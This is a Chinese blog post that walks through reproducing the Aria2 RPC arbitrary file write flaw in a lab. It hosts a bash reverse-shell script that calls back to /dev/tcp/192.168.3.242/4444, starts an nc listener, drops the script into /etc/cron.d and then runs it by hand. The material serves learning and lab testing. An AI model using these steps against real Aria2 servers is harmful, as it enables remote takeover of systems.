首页 > 其他分享 >Aria2 任意文件写入漏洞

Aria2 任意文件写入漏洞

时间:2024-07-28 21:56:45浏览次数:14  
标签:文件 shell 写入 漏洞 RPC Aria2 bash

目录

Aria2介绍

Aria2是一个在命令行下运行,多协议,多来源下载工具(HTTP / HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过–enable-rpc参数启动。Aria2的RPC服务器可以方便的添加、删除下载项目

我们可以使用 RPC 接口来操作 aria2 并将文件下载到任意目录,从而造成任意文件写入漏洞。

6800 是 Aria2 的 RPC 服务的默认端口。环境启动后,访问 和 服务会返回 404 页面

漏洞描述

RCE漏洞,可以让攻击通过控制文件下载链接,文件储存路径以及文件名,直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。同时通过Aria2提供的其他功能,诸如save-session等也能轻易地实现任意文件写入指定功能

漏洞复现

1.测试环境,访问http://192.168.3.243:6800/ 是一片空白
在这里插入图片描述
2、使用burp抓包,发包。发现报404错误
在这里插入图片描述
3、首先因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 http://binux.github.io/yaaw/demo/访问这个UI,点击这个小扳手(settings),添加你的靶场域名
在这里插入图片描述
4、配置Setting,按照下面的内容结合自身的ip地址填写, 其它的包括Base Dir不用填写保存后自动显现。
在这里插入图片描述
5.配置一个web服务器,kali已经集成了Apache,只要将其启动就可以开始使用了

启动命令:service apache2 start
停止命令: service apache2 stop

在这里插入图片描述
Shell文件内容:

#!/bin/bash
 
/bin/bash -i >& /dev/tcp/192.168.3.242/4444 0>&1

将shell文件放在/var/www/html/目录下
在这里插入图片描述

6、上传shell文件
首先在kali中开启监听:

nc -nvv -lp 4444

在这里插入图片描述
7、点击添加新增并且设置下载任务,填写shell的url,及受害主机shell文件的存储路径
在这里插入图片描述
和我查到的所有资料一样 ,都不能自动获得监听
在这里插入图片描述

8、手动获取监听

在靶机中输入:

docker ps                                
//查看容器id
docker exec -it 容器Id /bin/bash             
//进入容器shell   例如:docker exec -it c9ff092ad911 /bin/bash
cd /etc/cron.d                                    
//进入到cron.d目录
ls 

在这里插入图片描述
从上面已经上传的shell可以看出,这个任意文件写入漏洞是存在的

9、手动给shell加权限,执行shell

chmod +777 shell
./shell

在这里插入图片描述

标签:文件,shell,写入,漏洞,RPC,Aria2,bash
From: https://blog.csdn.net/m0_53008479/article/details/140750547

相关文章

  • 文件上传漏洞,看这一篇文章就够了
    文件上传漏洞文件上传漏洞介绍就是指用户上传了一个可执行的脚本文件,并通过脚本文件获得了执行服务器端命令的能力,出问题的地方在于怎么处理、解释文件,那么攻击方就要思考如何绕过检测和过滤文件上传漏洞的危害上传文件是web脚本语言,服务器的web容器解释并执行了用户上......
  • 将多个实体类集合写入同一个 Excel 文件的不同 Sheet 页
    importcom.alibaba.excel.EasyExcel;importcom.alibaba.excel.ExcelWriter;importcom.alibaba.excel.support.ExcelTypeEnum;importcom.alibaba.excel.write.metadata.WriteSheet;importlombok.extern.slf4j.Slf4j;importjava.util.List;importjava.util.Map;......
  • 6、MVEL漏洞
    build.sh#!/bin/bash#构建镜像imageName=mveldemoversion=v1.0level=iecho"imageName:$imageName"echo"=========开始构建Dockerfile==========="dockerbuild-fDockerfile-t$imageName:$version.echo"=========构建完成Dockerfile=========......
  • 快排CMS1.2文件上传漏洞
    侵权声明本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[[email protected]]。我们将在确......
  • python---json文件写入
    ​ 使用到的知识点:os模块执行linux指令、json.dump()、withopenasf代码实现importsysimportosimportjson #向json文件file中添加内容data,其中data的类型为字典defwrite_json(file,data):    #如果文件存在,则删除    if(os.path.exists(fi......
  • sql注入漏洞复现
    and1=1正常and1=2报错从这就已经说明是sql数字型注入了上sqlmap验证一下存在布尔盲注,时间盲注......我是在漏洞盒子上提交的,能不能通过看运气吧下面这个漏洞已经是很久之前的了,现在已经是修复了,当时还是太年轻了......当时复现过程没有做好,截图也已经删掉了............
  • fastjson反序列化漏洞原理及<=1.2.24&<=1.2.47&Fastjson v1.2.80简单利用&不出网判断&修
    1、什么是fastjsonfastjson是一个有阿里开发的一个开源Java类库,可以将Java对象转换为JSON格式(序列化),当然它也可以将JSON字符串转换为Java对象(反序列化)。2、漏洞原理FastJson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类,并调⽤该类的set/get⽅法......
  • Java漏洞复现(ctfshow279-297)strust 漏洞复现及原理解释
    Java漏洞复现Strust原理JavaEE--------Struts2框架-CSDN博客Web279struts2漏洞S2-001是当用户提交表单数据且验证失败时,服务器使用OGNL表达式解析用户先前提交的参数值,%{value}并重新填充相应的表单数据。这里的%{value}简单理解就是和flask的模板注入{{}}差不多......
  • 为什么我会收到 Python IOError: [Errno 13] 写入文件时权限被拒绝?
    我不明白我做错了什么。我正在运行一些测试并将结果写入文件。写入文件的代码部分如下(在名为Tester的类中):@staticmethoddefprintHeader(resultsFileName):ifnotos.path.isfile(resultsFileName):#Thefiledoesnotexist,thus#......
  • kettle从入门到精通 第八十一课 ETL之kettle kettle中的json对象字段写入postgresql中
    1、上一节可讲解了如何将json数据写入pg数据库表中的json字段,虽然实现了效果,但若客户继续使用表输出步骤则仍然无法解决问题。正确的的解决方式是设置数据库连接参数stringtype=unspecified2、stringtype=unspecified参数的作用:当设置为 unspecified 时,pgJDBC驱动将根据数......